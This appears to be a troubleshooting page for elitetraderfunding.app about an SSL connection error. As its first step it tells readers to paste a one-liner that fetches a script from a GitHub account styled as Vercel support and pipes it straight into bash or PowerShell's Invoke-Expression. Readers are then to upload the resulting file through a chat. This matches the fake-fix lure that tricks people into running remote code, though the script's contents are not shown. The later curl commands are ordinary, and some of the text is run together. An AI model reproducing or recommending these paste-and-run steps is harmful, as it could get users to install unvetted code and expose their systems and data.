Command Palette
Search for a command to run...
Search for a command to run...
Fix: “This Site Can’t Provide a Secure Connection” (ERR_SSL_PROTOCOL_ERROR)
Sometimes our site may show a secure connection error even though it’s online and working for most users. This usually happens when Vercel’s security system flags your IP, network, or browser setup. Don’t worry — it’s easy to check and fix.
On Windows
C:\Users\YourName>
On Mac
On Linux
Before doing anything else, please run the official Vercel connectivity debug script. It automatically checks SSL, DNS, IPv4/IPv6 routing, and HTTP responses — and saves a file you can send to us for review.
🖥️ Mac / Linux (from your Terminal)
curl -s https://raw.githubusercontent.com/vercel-support/vercel-connect-debug/main/vercel-debug.sh | bash | tee
🪟 Windows (from PowerShell)
Invoke-RestMethod -Uri https://raw.githubusercontent.com/vercel-support/vercel-connect-debug/main/vercel-debug.ps1 | Invoke-Expression | tee vercel-debug.txt
⚠️ After it finishes, a file named vercel-debug.txt will be created. Please attach that file to a support ticket via the Boomeo AI chat — it contains all the details we need to pinpoint the problem quickly.
If you prefer to test manually, copy and paste each line below into the terminal and press Enter after each one:
curl -I -A "Mozilla/5.0" https://elitetraderfunding.app/curl -4 -I -A "Mozilla/5.0" https://elitetraderfunding.app/curl -6 -I -A "Mozilla/5.0" https://elitetraderfunding.app/
What you’re doing:
If you see:
HTTP/2 200Server: Vercel
✅ The site is reachable — something local (browser or network) is blocking it.
If you see:
Connection failed
orNo response
🚫 Your network or security software is likely blocking it.
To send us the results manually, please follow these steps:
On Windows:
curl -v https://elitetraderfunding.app/ --http1.1 2>&1 | Out-File etf_debug.txt
etf_debug.txt in your user folder.etf_debug.txt, and attach it to a support ticket via the Boomeo AI chat.On Mac or Linux:
curl -v https://elitetraderfunding.app/ --http1.1 2>&1 | tee etf_debug.txt
etf_debug.txt.These details help us see exactly what your computer sees — we’ll pinpoint the cause much faster.
When opening a support ticket via the Boomeo AI chat, please include:
We’ll review your connection data securely and help you get back online quickly.